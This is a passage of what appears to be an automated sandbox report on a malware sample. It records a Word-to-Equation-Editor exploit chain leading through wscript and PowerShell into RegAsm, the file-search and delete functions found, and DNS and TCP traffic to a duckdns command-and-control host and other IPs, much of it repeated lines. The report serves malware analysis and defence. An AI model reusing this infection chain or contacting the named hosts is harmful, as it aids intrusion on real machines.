              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: global trafficDNS query: name: raw.githubusercontent.com
              Source: global trafficDNS query: name: cavps7.duckdns.org
              Source: global trafficDNS query: name: cavps7.duckdns.org
              Source: global trafficDNS query: name: geoplugin.net
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 178.237.33.50:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
